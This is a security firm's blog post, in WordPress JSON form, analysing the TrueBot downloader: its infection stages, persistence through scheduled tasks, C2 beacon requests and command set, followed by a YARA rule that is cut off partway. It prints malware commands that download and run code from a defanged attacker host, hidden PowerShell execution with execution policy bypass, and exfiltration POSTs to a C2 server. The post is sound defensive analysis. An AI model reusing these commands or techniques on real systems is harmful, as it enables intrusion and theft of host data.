{"id":6991,"date":"2023-09-18T09:51:41","date_gmt":"2023-09-18T09:51:41","guid":{"rendered":"https:\/\/fortgale.com\/blog\/?p=6991"},"modified":"2023-09-22T08:01:53","modified_gmt":"2023-09-22T08:01:53","slug":"truebot-malware-analysis-16-06-2023","status":"publish","type":"post","link":"https:\/\/fortgale.com\/blog\/malware-analysis\/truebot-malware-analysis-16-06-2023\/","title":{"rendered":"TrueBot Malware Analysis (16-06-2023)"},"content":{"rendered":"After recent online publications regarding the <strong>TrueBot malware<\/strong> (<a href=\"https:\/\/blogs.vmware.com\/security\/2023\/06\/carbon-blacks-truebot-detection.html\" target=\"_blank\" rel=\"noreferrer noopener\">VMware<\/a>, <a href=\"https:\/\/www.bleepingcomputer.com\/news\/security\/clop-ransomware-uses-truebot-malware-for-access-to-networks\/\">Bleeping<\/a> and <a href=\"https:\/\/thehackernews.com\/2023\/06\/alarming-surge-in-truebot-activity.html\" target=\"_blank\" rel=\"noreferrer noopener\">THN<\/a>), we have decided to contribute our analysis of this potential new threat. 
At the end, you will find the indicators of compromise and a Yara rule to identify it.\n\n<!-- \/wp:post-content -->\n\n<!-- wp:paragraph -->\n\nBefore starting with the technical analysis of the malware, we believe it is useful to highlight some of its features:\n\n<!-- \/wp:paragraph -->\n\n<!-- wp:list -->\n<ul>\n \t<li style=\"list-style-type: none\">\n<ul><!-- wp:list-item --><\/ul>\n<\/li>\n<\/ul>\n<ul>\n \t<li style=\"list-style-type: none\">\n<ul>\n \t<li>It is a <strong><em>downloader<\/em><\/strong> type malware, used in the early stages of compromise.<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<!-- \/wp:list-item -->\n\n<!-- wp:list-item -->\n<ul>\n \t<li style=\"list-style-type: none\">\n<ul>\n \t<li>It has used the Raspberry Robin worm as an attack vector.<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<!-- \/wp:list-item -->\n<!-- wp:list-item -->\n<ul>\n \t<li style=\"list-style-type: none\">\n<ul>\n \t<li>It has been associated with at least two different Ransomware (<a href=\"https:\/\/www.cisa.gov\/news-events\/cybersecurity-advisories\/aa23-158a\" target=\"_blank\" rel=\"noreferrer noopener\">Cl0p<\/a> and <a href=\"https:\/\/malpedia.caad.fkie.fraunhofer.de\/actor\/evil_corp\" target=\"_blank\" rel=\"noreferrer noopener\">EvilCorp<\/a>).<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<!-- \/wp:list-item -->\n\n<!-- wp:list-item -->\n<ul>\n \t<li style=\"list-style-type: none\">\n<ul>\n \t<li>It is the evolution of the Silent.Dropper malware.<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<!-- \/wp:list-item -->\n\n<!-- wp:list-item -->\n<ul>\n \t<li style=\"list-style-type: none\">\n<ul>\n \t<li>It is a tool used by the criminal actor known as <a href=\"https:\/\/fortgale.com\/threats\/threat-actor\/silence\/\" target=\"_blank\" rel=\"noreferrer noopener\"><strong>Silence<\/strong><\/a>.<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<!-- \/wp:list-item -->\n\n<!-- wp:paragraph -->\n\nThe following is the general scheme of compromise:\n\n<!-- \/wp:paragraph -->\n\n<!-- wp:image 
{\"id\":6548,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" width=\"1024\" height=\"587\" class=\"wp-image-6548\" src=\"https:\/\/fortgale.com\/blog\/wp-content\/uploads\/sites\/2\/2023\/06\/TrueBot-Infection-Chain-1024x587.png\" alt=\"\" srcset=\"https:\/\/fortgale.com\/blog\/wp-content\/uploads\/sites\/2\/2023\/06\/TrueBot-Infection-Chain-1024x587.png 1024w, https:\/\/fortgale.com\/blog\/wp-content\/uploads\/sites\/2\/2023\/06\/TrueBot-Infection-Chain-300x172.png 300w, https:\/\/fortgale.com\/blog\/wp-content\/uploads\/sites\/2\/2023\/06\/TrueBot-Infection-Chain-768x440.png 768w, https:\/\/fortgale.com\/blog\/wp-content\/uploads\/sites\/2\/2023\/06\/TrueBot-Infection-Chain.png 1051w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" loading=\"lazy\" \/><\/figure>\n<!-- \/wp:image -->\n\n<!-- wp:paragraph -->\n<p style=\"text-align: center\">For more information on how to defend yourself: <a href=\"https:\/\/fortgale.com\" target=\"_blank\" rel=\"noreferrer noopener\">fortgale.com<\/a><\/p>\n<!-- \/wp:paragraph -->\n\n<!-- wp:spacer -->\n<div class=\"wp-block-spacer\" style=\"height: 100px\" aria-hidden=\"true\"><\/div>\n<!-- \/wp:spacer -->\n\n<!-- wp:heading {\"textAlign\":\"center\",\"level\":1} -->\n<h1 id=\"h-analisi-tecnica\" class=\"wp-block-heading has-text-align-center\">Technical analysis<\/h1>\n<!-- \/wp:heading -->\n\n<!-- wp:spacer {\"height\":\"60px\"} -->\n<div class=\"wp-block-spacer\" style=\"height: 60px\" aria-hidden=\"true\"><\/div>\n<!-- \/wp:spacer -->\n\n<!-- wp:heading -->\n<h2 id=\"h-stage-1-javascript\" class=\"wp-block-heading\">Stage 1 &#8211; JavaScript<\/h2>\n<!-- \/wp:heading -->\n\n<!-- wp:paragraph -->\n\nOur analysis begins with the identification of a JavaScript <em>file<\/em>, presumably inserted as an attachment to a malicious email. From intelligence activities, it was possible to recover the file named <strong>information_7_apr-4753978.js<\/strong>. 
The content of the <em>script<\/em> is obfuscated, in order to make analysis activities more complex:\n<!-- \/wp:paragraph -->\n\n<!-- wp:image {\"align\":\"center\",\"id\":6435,\"width\":438,\"height\":502,\"sizeSlug\":\"full\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><\/figure>\n<!-- \/wp:image -->\n\n<!-- wp:paragraph -->\n\nAfter a deep cleaning of the code, the only noteworthy command emerges as:\n\n<!-- \/wp:paragraph -->\n\n<!-- wp:image {\"align\":\"center\",\"id\":6436,\"width\":929,\"height\":44,\"sizeSlug\":\"full\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><img decoding=\"async\" class=\"wp-image-6436\" src=\"https:\/\/fortgale.com\/blog\/wp-content\/uploads\/sites\/2\/2023\/06\/image-3.png\" alt=\"\" width=\"929\" height=\"44\" srcset=\"https:\/\/fortgale.com\/blog\/wp-content\/uploads\/sites\/2\/2023\/06\/image-3.png 979w, https:\/\/fortgale.com\/blog\/wp-content\/uploads\/sites\/2\/2023\/06\/image-3-300x14.png 300w, https:\/\/fortgale.com\/blog\/wp-content\/uploads\/sites\/2\/2023\/06\/image-3-768x37.png 768w\" sizes=\"(max-width: 929px) 100vw, 929px\" loading=\"lazy\" \/><\/figure>\n<!-- \/wp:image -->\n\n<!-- wp:paragraph -->\n\nThe content, encoded in <em>Base64<\/em>, is represented here in its de-obfuscated form:\n\n<!-- \/wp:paragraph -->\n\n<!-- wp:image {\"align\":\"center\",\"id\":6437,\"width\":545,\"height\":114,\"sizeSlug\":\"full\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><img decoding=\"async\" class=\"wp-image-6437\" src=\"https:\/\/fortgale.com\/blog\/wp-content\/uploads\/sites\/2\/2023\/06\/image-4.png\" alt=\"\" width=\"545\" height=\"114\" srcset=\"https:\/\/fortgale.com\/blog\/wp-content\/uploads\/sites\/2\/2023\/06\/image-4.png 845w, https:\/\/fortgale.com\/blog\/wp-content\/uploads\/sites\/2\/2023\/06\/image-4-300x64.png 300w\" sizes=\"(max-width: 
545px) 100vw, 545px\" loading=\"lazy\" \/><\/figure>\n<!-- \/wp:image -->\n\n<!-- wp:paragraph -->\n\nIt is a PowerShell command that executes the file &#8220;<em><strong>dll.png<\/strong><\/em>&#8220;, fetched from the address <strong><code>62[.]204[.]41[.]69<\/code><\/strong>. The format of the file does not appear to be an image type (PNG) or attributable to a <em>dll<\/em>. In reality, it is a PowerShell script encoded inside a text file:\n\n<!-- \/wp:paragraph -->\n\n<!-- wp:image {\"align\":\"center\",\"id\":6438,\"width\":578,\"height\":280,\"sizeSlug\":\"full\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><img decoding=\"async\" class=\"wp-image-6438\" src=\"https:\/\/fortgale.com\/blog\/wp-content\/uploads\/sites\/2\/2023\/06\/image-5.png\" alt=\"\" width=\"578\" height=\"280\" srcset=\"https:\/\/fortgale.com\/blog\/wp-content\/uploads\/sites\/2\/2023\/06\/image-5.png 895w, https:\/\/fortgale.com\/blog\/wp-content\/uploads\/sites\/2\/2023\/06\/image-5-300x145.png 300w, https:\/\/fortgale.com\/blog\/wp-content\/uploads\/sites\/2\/2023\/06\/image-5-768x372.png 768w\" sizes=\"(max-width: 578px) 100vw, 578px\" loading=\"lazy\" \/><\/figure>\n<!-- \/wp:image -->\n\n<!-- wp:spacer -->\n<div class=\"wp-block-spacer\" style=\"height: 100px\" aria-hidden=\"true\"><\/div>\n<!-- \/wp:spacer -->\n\n<!-- wp:heading -->\n<h2 id=\"h-stage2-dll\" class=\"wp-block-heading\">Stage2 &#8211; DLL<\/h2>\n<!-- \/wp:heading -->\n\n<!-- wp:paragraph -->\n\nThe script, once executed, starts the download of a <em>dynamic library<\/em> (<strong><code>ldn.dll<\/code><\/strong>) from the address <strong><code>62[.]204[.]41[.]69<\/code><\/strong> and saves it in the path <strong><code>$env:APPDATA\\ <\/code><\/strong>with name<strong><code> NoSleep.dll<\/code><\/strong>.\n\n<!-- \/wp:paragraph -->\n\n<!-- wp:image {\"align\":\"center\",\"id\":6439,\"width\":600,\"height\":243,\"sizeSlug\":\"full\",\"linkDestination\":\"none\"} 
-->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><img decoding=\"async\" class=\"wp-image-6439\" src=\"https:\/\/fortgale.com\/blog\/wp-content\/uploads\/sites\/2\/2023\/06\/image-6.png\" alt=\"\" width=\"600\" height=\"243\" srcset=\"https:\/\/fortgale.com\/blog\/wp-content\/uploads\/sites\/2\/2023\/06\/image-6.png 871w, https:\/\/fortgale.com\/blog\/wp-content\/uploads\/sites\/2\/2023\/06\/image-6-300x122.png 300w, https:\/\/fortgale.com\/blog\/wp-content\/uploads\/sites\/2\/2023\/06\/image-6-768x311.png 768w\" sizes=\"(max-width: 600px) 100vw, 600px\" loading=\"lazy\" \/><\/figure>\n<!-- \/wp:image -->\n\n<!-- wp:paragraph -->\n\nThis is then loaded into memory via the command\n\n<!-- \/wp:paragraph -->\n\n<!-- wp:code -->\n<pre class=\"wp-block-code\"><code>cmd \/c rundll32 %APPDATA%\\NoSleep.dll,ChkdskExs<\/code><\/pre>\n<!-- \/wp:code -->\n\n<!-- wp:spacer -->\n<div class=\"wp-block-spacer\" style=\"height: 100px\" aria-hidden=\"true\"><\/div>\n<!-- \/wp:spacer -->\n\n<!-- wp:heading -->\n<h2 id=\"h-stage3-c-c\" class=\"wp-block-heading\">Stage3 &#8211; C&amp;C<\/h2>\n<!-- \/wp:heading -->\n\n<!-- wp:paragraph -->\n\nThe library <code><strong>NoSleep.dll<\/strong><\/code>, signed with a Sectigo certificate, is none other than the <strong><em>TrueBot<\/em><\/strong> malware:\n\n<!-- \/wp:paragraph -->\n\n<!-- wp:image {\"align\":\"center\",\"id\":6440,\"width\":600,\"height\":254,\"sizeSlug\":\"full\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><img decoding=\"async\" class=\"wp-image-6440\" src=\"https:\/\/fortgale.com\/blog\/wp-content\/uploads\/sites\/2\/2023\/06\/image-7.png\" alt=\"\" width=\"600\" height=\"254\" srcset=\"https:\/\/fortgale.com\/blog\/wp-content\/uploads\/sites\/2\/2023\/06\/image-7.png 979w, https:\/\/fortgale.com\/blog\/wp-content\/uploads\/sites\/2\/2023\/06\/image-7-300x127.png 300w, 
https:\/\/fortgale.com\/blog\/wp-content\/uploads\/sites\/2\/2023\/06\/image-7-768x326.png 768w\" sizes=\"(max-width: 600px) 100vw, 600px\" loading=\"lazy\" \/><\/figure>\n<!-- \/wp:image -->\n\n<!-- wp:paragraph -->\n\nThanks to reverse engineering and dynamic analysis, it was possible to reconstruct its entire behavior.\n\n<!-- \/wp:paragraph -->\n\n<!-- wp:paragraph -->\n\nThe first identified activities are related to assigning a unique identifier to the infected machine. This is achieved by creating the file <code><strong>C:\\ProgramData\\&lt;GUID&gt;.JSONIP<\/strong><\/code> and a <em>mutex<\/em> with the name <strong><code>(u3qkfewi3ujrk32lqpti32ofwq<\/code><\/strong>.\n\n<!-- \/wp:paragraph -->\n\n<!-- wp:image {\"align\":\"center\",\"id\":6441,\"width\":754,\"height\":32,\"sizeSlug\":\"full\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><img decoding=\"async\" class=\"wp-image-6441\" src=\"https:\/\/fortgale.com\/blog\/wp-content\/uploads\/sites\/2\/2023\/06\/image-8.png\" alt=\"\" width=\"754\" height=\"32\" srcset=\"https:\/\/fortgale.com\/blog\/wp-content\/uploads\/sites\/2\/2023\/06\/image-8.png 979w, https:\/\/fortgale.com\/blog\/wp-content\/uploads\/sites\/2\/2023\/06\/image-8-300x13.png 300w, https:\/\/fortgale.com\/blog\/wp-content\/uploads\/sites\/2\/2023\/06\/image-8-768x34.png 768w\" sizes=\"(max-width: 754px) 100vw, 754px\" loading=\"lazy\" \/><\/figure>\n<!-- \/wp:image -->\n\n<!-- wp:paragraph -->\n\nSubsequently, the malware proceeds to create two scheduled tasks to ensure persistence in the system:\n\n<!-- \/wp:paragraph -->\n\n<!-- wp:list -->\n<ul>\n \t<li style=\"list-style-type: none\">\n<ul><!-- wp:list-item --><\/ul>\n<\/li>\n<\/ul>\n<ul>\n \t<li style=\"list-style-type: none\">\n<ul>\n \t<li><strong>MicrosoftEdgeUpdateTaskMachineCore{1575CC8A-457A-1700-652A-6AF2B031A266}<\/strong><\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<!-- \/wp:list-item -->\n\n<!-- wp:list-item -->\n<ul>\n \t<li 
style=\"list-style-type: none\">\n<ul>\n \t<li><strong>MicrosoftEdgeUpdateTaskMachineCore{1575CC8A-457A-1700-652A-6AF2B031A266}<\/strong><\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<!-- \/wp:list-item -->\n\n<!-- \/wp:list -->\n\n<!-- wp:paragraph -->\n\nBoth tasks are assigned to execute the same command every ten minutes:\n\n<!-- \/wp:paragraph -->\n\n<!-- wp:code -->\n<pre class=\"wp-block-code\"><code>cmd \/c C:\\Windows\\SysWOW64\\rundll32.exe \/S &lt;PathDll&gt;\\NoSleep.dll,ChkdskExs<\/code><\/pre>\n<!-- \/wp:code -->\n\n<!-- wp:image {\"align\":\"center\",\"id\":6444,\"width\":529,\"height\":188,\"sizeSlug\":\"full\",\"linkDestination\":\"none\"} -->\n<figure><\/figure>\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><img decoding=\"async\" class=\"wp-image-6444\" src=\"https:\/\/fortgale.com\/blog\/wp-content\/uploads\/sites\/2\/2023\/06\/image-10.png\" alt=\"\" width=\"529\" height=\"188\" srcset=\"https:\/\/fortgale.com\/blog\/wp-content\/uploads\/sites\/2\/2023\/06\/image-10.png 802w, https:\/\/fortgale.com\/blog\/wp-content\/uploads\/sites\/2\/2023\/06\/image-10-300x107.png 300w, https:\/\/fortgale.com\/blog\/wp-content\/uploads\/sites\/2\/2023\/06\/image-10-768x273.png 768w\" sizes=\"(max-width: 529px) 100vw, 529px\" loading=\"lazy\" \/><\/figure>\n<!-- \/wp:image -->\n\n<!-- wp:image {\"align\":\"center\",\"id\":6445,\"width\":408,\"height\":336,\"sizeSlug\":\"full\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><img decoding=\"async\" class=\"wp-image-6445\" src=\"https:\/\/fortgale.com\/blog\/wp-content\/uploads\/sites\/2\/2023\/06\/image-11.png\" alt=\"\" width=\"408\" height=\"336\" srcset=\"https:\/\/fortgale.com\/blog\/wp-content\/uploads\/sites\/2\/2023\/06\/image-11.png 671w, https:\/\/fortgale.com\/blog\/wp-content\/uploads\/sites\/2\/2023\/06\/image-11-300x247.png 300w\" sizes=\"(max-width: 408px) 100vw, 408px\" loading=\"lazy\" \/><\/figure>\n<!-- \/wp:image -->\n\n<!-- 
wp:paragraph -->\n\nAt this point, a list of executables associated with active processes is created, excluding system services.\n\n<!-- \/wp:paragraph -->\n\n<!-- wp:paragraph -->\n\nFinally, this list is sent in <strong><em>URLEncode + Base64<\/em><\/strong> format to the Command and Control server via a <strong>POST<\/strong> to the URL <strong><code>hxxp:\/\/droogggdhfhf[.]com\/gate.php<\/code><\/strong>.\n\n<!-- \/wp:paragraph -->\n\n<!-- wp:code {\"style\":{\"color\":{\"background\":\"#ffffff00\"}},\"textColor\":\"black\"} -->\n<pre class=\"wp-block-code has-black-color has-text-color has-background\" style=\"background-color: #ffffff00\"><code>POST \/gate.php HTTP\/1.0\nHost: droogggdhfhf.com\nContent-type: application\/x-www-form-urlencoded\nContent-length: 778\n\nq=[...]<\/code><\/pre>\n<!-- \/wp:code -->\n\n<!-- wp:paragraph -->\nAt each iteration of the task, general information about the infected system is forwarded to the server; this beacon also signals that the host is ready to receive further instructions to process.\n<!-- \/wp:paragraph -->\n\n<!-- wp:code -->\n<pre class=\"wp-block-code\"><code>POST \/gate.php HTTP\/1.0\nHost: droogggdhfhf.com\nContent-type: application\/x-www-form-urlencoded\nContent-length: 180\n\nbiUzZDdiNTMwMzRjLTdiNTI3ZTAwJWFiJWFiJWFiJWFiJWFiJWFiJWFiJWFiJWFiJWFiJWFiJWFiJWFiJWFiJWFiJWFiJTI2byUzZFdJTjEwJTI2YSUzZDY0JTI2dSUzZFdPUktHUk9VUCUyNnAlM2RERVNLVE9QLTE3MjE2MFMlMjZkJTNk<\/code><\/pre>\n<!-- \/wp:code -->\n\n<!-- wp:spacer -->\n<div class=\"wp-block-spacer\" style=\"height: 100px\" aria-hidden=\"true\"><\/div>\n<!-- \/wp:spacer -->\n\n<!-- wp:heading {\"textAlign\":\"center\"} -->\n<h2 id=\"capability-analysis\" class=\"wp-block-heading has-text-align-center\">Capability Analysis<\/h2>\n<!-- \/wp:heading -->\n<!-- wp:spacer -->\n<div class=\"wp-block-spacer\" style=\"height: 100px\" aria-hidden=\"true\"><\/div>\n<!-- \/wp:spacer -->\n\n<!-- wp:paragraph -->\nThe main purpose of the 
malware is to send information about active processes in the system to the C2 server and execute the commands returned by the server.\n<!-- \/wp:paragraph -->\n\n<!-- wp:paragraph -->\n\nWhen compared to other malware of the same type, the set of operations that TrueBot can perform is extremely limited:\n<!-- \/wp:paragraph -->\n\n<!-- wp:table -->\n<figure class=\"wp-block-table\">\n<table>\n<tbody>\n<tr>\n<td><strong>Command<\/strong><\/td>\n<td><strong>Effect<\/strong><\/td>\n<\/tr>\n<tr>\n<td><strong>KLLS<\/strong><\/td>\n<td>Deletes the DLL and terminates the process.<\/td>\n<\/tr>\n<tr>\n<td><strong>404NO<\/strong><\/td>\n<td>Empty command.<\/td>\n<\/tr>\n<tr>\n<td><strong>http<\/strong><\/td>\n<td><em>Not identified.<\/em> Parses values separated by &#8220;|&#8221; or &#8220;\/&#8221;.<\/td>\n<\/tr>\n<tr>\n<td><strong>PS1<\/strong><\/td>\n<td>Downloads a PowerShell script to the path <strong>C:\\ProgramData\\&lt;GUID&gt;.ps1<\/strong> and executes it via the command <strong>wmic.exe process call create &quot;powershell -executionpolicy bypass -nop -w hidden &lt;file ps1&gt;&quot;<\/strong>.<\/td>\n<\/tr>\n<tr>\n<td><strong>SHC<\/strong><\/td>\n<td>Downloads and executes a <em>shellcode<\/em>, injecting it into a new cmd.exe process.<\/td>\n<\/tr>\n<tr>\n<td><strong>S64<\/strong><\/td>\n<td>Downloads and executes a <em>shellcode<\/em>, injecting it into a new cmd.exe process.<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<\/figure>\n<!-- \/wp:table -->\n<!-- wp:spacer -->\n<div class=\"wp-block-spacer\" style=\"height: 100px\" aria-hidden=\"true\"><\/div>\n<!-- \/wp:spacer -->\n\n<!-- wp:heading {\"textAlign\":\"center\"} -->\n<h2 id=\"h-riepilogo\" class=\"wp-block-heading has-text-align-center\">Summary<\/h2>\n<!-- \/wp:heading -->\n\n<!-- wp:spacer -->\n<div class=\"wp-block-spacer\" style=\"height: 100px\" aria-hidden=\"true\"><\/div>\n<!-- \/wp:spacer -->\n\n<!-- wp:paragraph -->\n\n<!-- \/wp:paragraph -->\n\n<!-- wp:paragraph -->\nTrueBot is a <em>downloader<\/em> malware, and 
as such it is mainly used by an operator to convey other malicious software (e.g. <em><strong>CobaltStrike<\/strong><\/em>).\n<!-- \/wp:paragraph -->\n\n<!-- wp:paragraph -->\nIt is clear that it was designed to complete generic tasks. In fact, there are no advanced commands usually used by an attacker to carry out advanced compromise activities.\n<!-- \/wp:paragraph -->\n\n<!-- wp:image {\"align\":\"center\",\"id\":6434,\"width\":547,\"height\":228,\"sizeSlug\":\"full\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><img decoding=\"async\" class=\"wp-image-6434\" src=\"https:\/\/fortgale.com\/blog\/wp-content\/uploads\/sites\/2\/2023\/06\/image-1.png\" alt=\"\" width=\"547\" height=\"228\" srcset=\"https:\/\/fortgale.com\/blog\/wp-content\/uploads\/sites\/2\/2023\/06\/image-1.png 802w, https:\/\/fortgale.com\/blog\/wp-content\/uploads\/sites\/2\/2023\/06\/image-1-300x125.png 300w, https:\/\/fortgale.com\/blog\/wp-content\/uploads\/sites\/2\/2023\/06\/image-1-768x320.png 768w\" sizes=\"(max-width: 547px) 100vw, 547px\" loading=\"lazy\" \/><\/figure>\n<!-- \/wp:image -->\n\n<!-- wp:spacer -->\n<div class=\"wp-block-spacer\" style=\"height: 100px\" aria-hidden=\"true\"><\/div>\n<!-- \/wp:spacer -->\n\n<!-- wp:heading {\"textAlign\":\"center\"} -->\n<h2 id=\"h-regole-yara\" class=\"wp-block-heading has-text-align-center\">YARA Rule<\/h2>\n<!-- \/wp:heading -->\n\n<!-- wp:spacer -->\n<div class=\"wp-block-spacer\" style=\"height: 100px\" aria-hidden=\"true\"><\/div>\n<!-- \/wp:spacer -->\n\n<!-- wp:paragraph -->\nOur malware analysis team has developed the following <em><strong>Yara<\/strong><\/em> rule:\n<!-- \/wp:paragraph -->\n\n<!-- wp:html -->\n<div style=\"font-family: monospace;padding: 1.0pt 4.0pt 1.0pt 4.0pt;background: whitesmoke\">\n<p class=\"MsoNormal\" style=\"margin-bottom: 0cm;text-align: left;line-height: 14.25pt;background: whitesmoke;border: none;padding: 0cm\" align=\"left\"><span 
style=\"font-size: 10.5pt;color: #7a3e9d\">rule<\/span> <b><span style=\"font-size: 10.5pt;color: #aa3731\">TrueBotRule<\/span><\/b> <span style=\"font-size: 10.5pt;color: #777777\">{<\/span><\/p>\n<p class=\"MsoNormal\" style=\"margin-bottom: 0cm;text-align: left;line-height: 14.25pt;background: whitesmoke;border: none;padding: 0cm\" align=\"left\"><span style=\"font-size: 10.5pt;color: #333333\">\u00a0 \u00a0<\/span><span style=\"font-size: 10.5pt;color: #4b69c6\">meta<\/span><span style=\"font-size: 10.5pt;color: #333333\">:<\/span><\/p>\n<p class=\"MsoNormal\" style=\"margin-bottom: 0cm;text-align: left;line-height: 14.25pt;background: whitesmoke;border: none;padding: 0cm\" align=\"left\"><span lang=\"EN-US\" style=\"font-size: 10.5pt;color: #333333\">\u00a0 \u00a0 \u00a0 \u00a0Author <\/span><span lang=\"EN-US\" style=\"font-size: 10.5pt;color: #777777\">=<\/span> <span lang=\"EN-US\" style=\"font-size: 10.5pt;color: #777777\">&#8220;<\/span><span lang=\"EN-US\" style=\"font-size: 10.5pt;color: #448c27\">Fortgale<\/span><span lang=\"EN-US\" style=\"font-size: 10.5pt;color: #777777\">&#8220;<\/span><\/p>\n<p class=\"MsoNormal\" style=\"margin-bottom: 0cm;text-align: left;line-height: 14.25pt;background: whitesmoke;border: none;padding: 0cm\" align=\"left\"><span lang=\"EN-US\" style=\"font-size: 10.5pt;color: #333333\">\u00a0 \u00a0 \u00a0 \u00a0Summary <\/span><span lang=\"EN-US\" style=\"font-size: 10.5pt;color: #777777\">=<\/span> <span lang=\"EN-US\" style=\"font-size: 10.5pt;color: #777777\">&#8220;<\/span><span lang=\"EN-US\" style=\"font-size: 10.5pt;color: #448c27\">TrueBot Yara Rule<\/span><span lang=\"EN-US\" style=\"font-size: 10.5pt;color: #777777\">&#8220;<\/span><\/p>\n<p class=\"MsoNormal\" style=\"margin-bottom: 0cm;text-align: left;line-height: 14.25pt;background: whitesmoke;border: none;padding: 0cm\" align=\"left\"><span lang=\"EN-US\" style=\"font-size: 10.5pt;color: #333333\">\u00a0 \u00a0<\/span><b><span lang=\"EN-US\" style=\"font-size: 
10.5pt;color: #4b69c6\">strings<\/span><\/b><b><span lang=\"EN-US\" style=\"font-size: 10.5pt;color: #333333\">:<\/span><\/b><\/p>\n<p class=\"MsoNormal\" style=\"margin-bottom: 0cm;text-align: left;line-height: 14.25pt;background: whitesmoke;border: none;padding: 0cm\" align=\"left\"><b><span lang=\"EN-US\" style=\"font-size: 10.5pt;color: #333333\">\u00a0 \u00a0 \u00a0 \u00a0<\/span><\/b><b><span lang=\"EN-US\" style=\"font-size: 10.5pt;color: #9c5d27\">$<\/span><\/b><b><span lang=\"EN-US\" style=\"font-size: 10.5pt;color: #7a3e9d\">possible_function_name<\/span><\/b><b> <\/b><b><span lang=\"EN-US\" style=\"font-size: 10.5pt;color: #777777\">=<\/span><\/b><b> <\/b><b><span lang=\"EN-US\" style=\"font-size: 10.5pt;color: #777777\">&#8220;<\/span><\/b><b><span lang=\"EN-US\" style=\"font-size: 10.5pt;color: #448c27\">ChkdskExs<\/span><\/b><b><span lang=\"EN-US\" style=\"font-size: 10.5pt;color: #777777\">&#8220;<\/span><\/b><b> <\/b><b><span lang=\"EN-US\" style=\"font-size: 10.5pt;color: #4b69c6\">wide<\/span><\/b><b> <\/b><b><span lang=\"EN-US\" style=\"font-size: 10.5pt;color: #4b69c6\">ascii<\/span><\/b><\/p>\n<p class=\"MsoNormal\" style=\"margin-bottom: 0cm;text-align: left;line-height: 14.25pt;background: whitesmoke;border: none;padding: 0cm\" align=\"left\"><b><span lang=\"EN-US\" style=\"font-size: 10.5pt;color: #333333\">\u00a0 \u00a0 \u00a0 \u00a0<\/span><\/b><b><span lang=\"EN-US\" style=\"font-size: 10.5pt;color: #9c5d27\">$<\/span><\/b><b><span lang=\"EN-US\" style=\"font-size: 10.5pt;color: #7a3e9d\">parameters_mapping<\/span><\/b><b> <\/b><b><span lang=\"EN-US\" style=\"font-size: 10.5pt;color: #777777\">=<\/span><\/b><b> <\/b><b><span lang=\"EN-US\" style=\"font-size: 10.5pt;color: #777777\">&#8220;<\/span><\/b><b><span lang=\"EN-US\" style=\"font-size: 10.5pt;color: #448c27\">n=%s&amp;o=%s&amp;a=%d&amp;u=%s&amp;p=%s&amp;d=%s<\/span><\/b><b><span lang=\"EN-US\" style=\"font-size: 10.5pt;color: #777777\">&#8220;<\/span><\/b><b> <\/b><b><span 
lang=\"EN-US\" style=\"font-size: 10.5pt;color: #4b69c6\">wide<\/span><\/b><b> <\/b><b><span lang=\"EN-US\" style=\"font-size: 10.5pt;color: #4b69c6\">ascii<\/span><\/b><\/p>\n<p class=\"MsoNormal\" style=\"margin-bottom: 0cm;text-align: left;line-height: 14.25pt;background: whitesmoke;border: none;padding: 0cm\" align=\"left\"><b><span lang=\"EN-US\" style=\"font-size: 10.5pt;color: #333333\">\u00a0 \u00a0 \u00a0 \u00a0<\/span><\/b><b><span lang=\"EN-US\" style=\"font-size: 10.5pt;color: #9c5d27\">$<\/span><\/b><b><span lang=\"EN-US\" style=\"font-size: 10.5pt;color: #7a3e9d\">ps1_path<\/span><\/b><b> <\/b><b><span lang=\"EN-US\" style=\"font-size: 10.5pt;color: #777777\">=<\/span><\/b><b> <\/b><b><span lang=\"EN-US\" style=\"font-size: 10.5pt;color: #777777\">&#8220;<\/span><\/b><b><span lang=\"EN-US\" style=\"font-size: 10.5pt;color: #448c27\">%s<\/span><\/b><b><span lang=\"EN-US\" style=\"font-size: 10.5pt;color: #777777\">\\\\<\/span><\/b><b><span lang=\"EN-US\" style=\"font-size: 10.5pt;color: #448c27\">%08x-%08x.ps1<\/span><\/b><b><span lang=\"EN-US\" style=\"font-size: 10.5pt;color: #777777\">&#8220;<\/span><\/b><b> <\/b><b><span lang=\"EN-US\" style=\"font-size: 10.5pt;color: #4b69c6\">wide<\/span><\/b><b> <\/b><b><span lang=\"EN-US\" style=\"font-size: 10.5pt;color: #4b69c6\">ascii<\/span><\/b><\/p>\n<p class=\"MsoNormal\" style=\"margin-bottom: 0cm;text-align: left;line-height: 14.25pt;background: whitesmoke;border: none;padding: 0cm\" align=\"left\"><b><span lang=\"EN-US\" style=\"font-size: 10.5pt;color: #333333\">\u00a0 \u00a0 \u00a0 \u00a0<\/span><\/b><b><span lang=\"EN-US\" style=\"font-size: 10.5pt;color: #9c5d27\">$<\/span><\/b><b><span lang=\"EN-US\" style=\"font-size: 10.5pt;color: #7a3e9d\">jsonip_regex<\/span><\/b><b> <\/b><b><span lang=\"EN-US\" style=\"font-size: 10.5pt;color: #777777\">=<\/span><\/b><b> <\/b><b><span lang=\"EN-US\" style=\"font-size: 10.5pt;color: #777777\">&#8220;<\/span><\/b><b><span lang=\"EN-US\" style=\"font-size: 
